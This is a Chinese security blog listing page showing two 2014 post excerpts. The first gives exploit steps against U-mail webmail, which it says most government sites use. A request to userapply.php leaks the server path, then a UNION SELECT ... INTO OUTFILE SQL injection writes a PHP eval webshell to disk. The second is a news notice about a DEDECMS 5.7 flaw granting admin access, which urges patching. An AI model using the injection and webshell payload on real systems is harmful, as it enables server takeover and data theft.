大部分政府网站U-mail存在直接拿shell漏洞

admin 发布于 2014-03-18 10:18
加入 webmail/userapply.php?execadd=333&DomainID=111 直接爆出物理地址 然后将 aa' union select 1,2,3,4,5,6,'<?php eval($_POST1);?>',8,9,10,11,12,13,14 into outfile 'D:/umail/WorldClie...

DEDECMS曝重大漏洞可获最高管理权限 提醒站长及时升级修复

admin 发布于 2014-02-21 05:36
2月20日消息,昨日腾讯电脑管家发布消息,称国内知名建站工具存在重大安全漏洞。近日,DEDECMS5.7及以前版本曝出严重漏洞,利用该漏洞可获得网站后台最高管理权近日,DEDECMS5.7及以前版本曝出严重漏洞,利用该漏洞可获得网站后台最高管理权限,查看任何数据或添加恶意文件,目前新版DEDECMS已修复该漏洞,但大部分网站未升级打补丁,对此管家温...